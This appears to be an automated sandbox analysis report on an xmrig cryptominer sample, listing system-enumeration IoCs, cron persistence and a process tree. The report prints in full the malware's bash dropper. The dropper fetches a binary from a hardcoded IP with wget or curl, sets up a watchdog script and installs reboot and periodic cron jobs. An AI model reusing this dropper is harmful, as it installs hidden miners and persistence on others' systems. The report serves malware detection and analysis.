xmrig | af508a2d4957cc29eb75519ea027bce5ed412f0b8bda9193dd3b4673eae7df28

execution persistence privilege_escalation

description	ioc	Process
File opened for reading	/sys/devices/virtual/dmi/id/product_name	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	.report_system

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

Cron

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.DjlPWC	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Reads hardware information 1 TTPs 14 IoCs

Accesses system info like serial numbers, manufacturer names etc.

System Information Discovery

description	ioc	Process
File opened for reading	/sys/devices/virtual/dmi/id/product_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_serial	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_name	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_serial	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_type	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_asset_tag	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/bios_date	.report_system

Checks CPU configuration 1 TTPs 1 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

description	ioc	Process
File opened for reading	/proc/cpuinfo	.report_system

Reads CPU attributes 1 TTPs 64 IoCs

System Information Discovery

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/physical_line_partition	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/type	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/type	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index5/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/topology/core_id	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/id	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index8/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/number_of_sets	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/physical_line_partition	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index4/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index7/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/possible	.report_system
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/id	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/size	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/type	.report_system
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/level	.report_system
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/id	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/id	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/size	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cpu_capacity	.report_system
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/topology/die_cpus	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/type	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/size	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/number_of_sets	.report_system
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/level	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/level	.report_system

Enumerates kernel/hardware configuration 1 TTPs 64 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

description	ioc	Process
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/kernel/mm/hugepages/hugepages-1048576kB/nr_hugepages	.report_system
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/firmware/dmi/tables/smbios_entry_point	.report_system
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/bus/soc/devices	.report_system
File opened for reading	/sys/devices/system/node/node0/access1/initiators	.report_system
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-1048576kB/nr_hugepages	.report_system
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node/node0/hugepages	.report_system
File opened for reading	/sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages	.report_system
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-2048kB/free_hugepages	.report_system
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/cpu_atom/cpus	.report_system
File opened for reading	/sys/kernel/mm/hugepages	.report_system
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node/online	.report_system
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node/node0/access0/initiators/write_latency	.report_system
File opened for reading	/sys/firmware/dmi/tables/DMI	.report_system
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/fs/cgroup/cpuset.mems.effective	.report_system
File opened for reading	/sys/devices/system/cpu	.report_system
File opened for reading	/sys/devices/system/node/node0/access0/initiators/read_bandwidth	.report_system
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages	.report_system
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/bus/dax/devices	.report_system

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/997/stat	pgrep
File opened for reading	/proc/7402/cmdline	pgrep
File opened for reading	/proc/46/ctty	pgrep
File opened for reading	/proc/6690/ctty	pgrep
File opened for reading	/proc/6792/stat	pgrep
File opened for reading	/proc/7063/status	pgrep
File opened for reading	/proc/189/cgroup	pgrep
File opened for reading	/proc/6505/cmdline	pgrep
File opened for reading	/proc/71/status	pgrep
File opened for reading	/proc/35/ctty	pgrep
File opened for reading	/proc/6783/ctty	pgrep
File opened for reading	/proc/6783/cmdline	pgrep
File opened for reading	/proc/7042/status	pgrep
File opened for reading	/proc/6800/cgroup	pgrep
File opened for reading	/proc/21/status	pgrep
File opened for reading	/proc/6629/cmdline	pgrep
File opened for reading	/proc/36/status	pgrep
File opened for reading	/proc/30/status	pgrep
File opened for reading	/proc/6710/status	pgrep
File opened for reading	/proc/6790/status	pgrep
File opened for reading	/proc/26/cgroup	pgrep
File opened for reading	/proc/10/cgroup	pgrep
File opened for reading	/proc/6786/stat	pgrep
File opened for reading	/proc/7134/cgroup	pgrep
File opened for reading	/proc/1068/stat	pgrep
File opened for reading	/proc/1006/ctty	pgrep
File opened for reading	/proc/6/ctty	pgrep
File opened for reading	/proc/6783/stat	pgrep
File opened for reading	/proc/6802/stat	pgrep
File opened for reading	/proc/1429/status	pgrep
File opened for reading	/proc/54/ctty	pgrep
File opened for reading	/proc/7096/cmdline	pgrep
File opened for reading	/proc/6940/cmdline	pgrep
File opened for reading	/proc/195/status	pgrep
File opened for reading	/proc/3/cgroup	pgrep
File opened for reading	/proc/1253/stat	pgrep
File opened for reading	/proc/195/ctty	pgrep
File opened for reading	/proc/6523/ctty	pgrep
File opened for reading	/proc/199/status	pgrep
File opened for reading	/proc/7134/stat	pgrep
File opened for reading	/proc/33/ctty	pgrep
File opened for reading	/proc/7134/ctty	pgrep
File opened for reading	/proc/25/stat	pgrep
File opened for reading	/proc/53/ctty	pgrep
File opened for reading	/proc/191/stat	pgrep
File opened for reading	/proc/7295/stat	pgrep
File opened for reading	/proc/6970/cgroup	pgrep
File opened for reading	/proc/6759/cmdline	pgrep
File opened for reading	/proc/37/ctty	pgrep
File opened for reading	/proc/508/stat	pgrep
File opened for reading	/proc/7270/cgroup	pgrep
File opened for reading	/proc/6823/cmdline	pgrep
File opened for reading	/proc/201/cgroup	pgrep
File opened for reading	/proc/197/cmdline	pgrep
File opened for reading	/proc/6599/ctty	pgrep
File opened for reading	/proc/17/stat	pgrep
File opened for reading	/proc/1019/ctty	pgrep
File opened for reading	/proc/7295/ctty	pgrep
File opened for reading	/proc/7663/cgroup	pgrep
File opened for reading	/proc/29/cmdline	pgrep
File opened for reading	/proc/35/status	pgrep
File opened for reading	/proc/1027/ctty	pgrep
File opened for reading	/proc/54/cgroup	pgrep
File opened for reading	/proc/7468/cgroup	pgrep

/tmp/.main.elf
/tmp/.main.elf
1⤵
PID:7308

/bin/bash
/tmp/.main.elf -c "exec '/tmp/.main.elf' \"\$@\"" /tmp/.main.elf
1⤵
PID:7308

/tmp/.main.elf
/tmp/.main.elf
1⤵
PID:7308

/bin/bash
/tmp/.main.elf -c " #!/bin/bash RCU_GP_DIR=\"/var/tmp/.rcu_gp\" REPORT_SYSTEM_URL=\"http://104.245.240.20/.puscarie/.report_system\" DIICOT_FILE=\"diicot\" setup_report_system() { if [ ! -d \"\$RCU_GP_DIR\" ]; then mkdir \"\$RCU_GP_DIR\" fi cd \"\$RCU_GP_DIR\" || exit if command -v wget &> /dev/null; then wget \"\$REPORT_SYSTEM_URL\" -O .report_system elif command -v curl &> /dev/null; then curl -o .report_system \"\$REPORT_SYSTEM_URL\" else echo \"Nu s-a gasit nici wget, nici curl\" exit 1 fi chmod +x .report_system cd - || exit } create_diicot_file() { DIICOT_PATH=\"\$RCU_GP_DIR/\$DIICOT_FILE\" cat <<EOL > \"\$DIICOT_PATH\" #!/bin/bash if ! pgrep -x .report_system >/dev/null; then /var/tmp/.rcu_gp/./.report_system > /dev/null 2>&1 & disown \$* else : fi EOL chmod +x \"\$DIICOT_PATH\" } setup_cron_jobs() { locatie=\"\$RCU_GP_DIR\" locatie2=\"\$PWD\" if [ ! -f \"\$locatie/.ps4\" ]; then echo \"\$locatie\" > \"\$locatie/.ps4\" fi if ! crontab -l | grep -q '.main'; then rm -rf \"\$locatie/.ps5\" echo \"@daily \$locatie/\$DIICOT_FILE\" >> \"\$locatie/.ps5\" sleep 1 echo \"@reboot \$locatie2/.main > /dev/null 2>&1 & disown\" >> \"\$locatie/.ps5\" sleep 1 echo \"@monthly \$locatie2/.main > /dev/null 2>&1 & disown\" >> \"\$locatie/.ps5\" sleep 1 crontab \"\$locatie/.ps5\" sleep 1 rm -rf \"\$locatie/.ps5\" fi } setup_report_system create_diicot_file setup_cron_jobs while : do \$(cat /var/tmp/.rcu_gp/.ps4)/diicot setup_cron_jobs sleep 2.5 done echo \"Merge bn mineru serifule\" " /tmp/.main.elf
1⤵
- File and Directory Permissions Modification
- Executes dropped EXE
PID:7308
- /usr/bin/mkdir
  mkdir /var/tmp/.rcu_gp
  2⤵
  PID:7310
- /usr/bin/wget
  wget http://104.245.240.20/.puscarie/.report_system -O .report_system
  2⤵
  PID:7311
- /usr/bin/chmod
  chmod +x .report_system
  2⤵
  - File and Directory Permissions Modification
  PID:7318
- /usr/bin/cat
  cat
  2⤵
  PID:7319
- /usr/bin/chmod
  chmod +x /var/tmp/.rcu_gp/diicot
  2⤵
  - File and Directory Permissions Modification
  PID:7320
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7322
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7321
- /usr/bin/rm
  rm -rf /var/tmp/.rcu_gp/.ps5
  2⤵
  PID:7323
- /usr/bin/sleep
  sleep 1
  2⤵
  PID:7324
- /usr/bin/sleep
  sleep 1
  2⤵
  PID:7325
- /usr/bin/sleep
  sleep 1
  2⤵
  PID:7326
- /usr/bin/crontab
  crontab /var/tmp/.rcu_gp/.ps5
  2⤵
  - Creates/modifies Cron job
  PID:7327
- /usr/bin/sleep
  sleep 1
  2⤵
  PID:7328
- /usr/bin/rm
  rm -rf /var/tmp/.rcu_gp/.ps5
  2⤵
  PID:7329
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7330
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:7331
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:7332
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7334
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7335
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7336
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7344
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7345
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:7346
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7347
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7348
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7349
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7350
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7351
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    PID:7352
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7354
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7353
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7355
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7356
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7357
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    PID:7358
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7359
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7360
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7361
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7362
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7363
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:7364
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7365
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7366
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7367
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7368
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7369
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:7370
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7371
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7372
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7373
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7374
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7375
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:7376
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7377
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7378
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7379
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7383
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7384
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    PID:7385
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7386
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7387
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7388
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7389
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7390
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:7391
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7392
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7393
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7394
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7395
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7396
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:7397
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7398
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7399
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7400
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7401
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7402
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:7403
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7405
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7404
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7406
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7407
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7408
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    PID:7409
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7410
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7411
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7412
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7413
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7414
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    PID:7415
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7416
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7417
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7418
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7419
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7420
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:7421
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7422
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7423
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7424
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7425
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7426
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:7427
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7428
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7429
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7430
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7431
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7432
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:7433
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7434
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7435
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7436
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7437
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7438
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:7439
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7441
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7440
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7442
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7455
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7456
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:7457
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7464
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7465
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7466
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7467
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7468
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:7469
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7470
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7471
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7472
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7473
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7474
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:7475
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7476
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7477
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7478
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7479
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7480
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:7481
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7482
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7483
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7484
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7485
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7486
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    PID:7487
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7488
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7489
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7490
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7491
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7492
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    PID:7493
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7495
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7494
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7496
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7497
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7498
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    PID:7499
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7500
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7501
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7502
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7503
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7504
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:7505
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7506
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7507
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7508
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7509
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7510
- - /usr/bin/pgrep
    pgrep -x .report_system
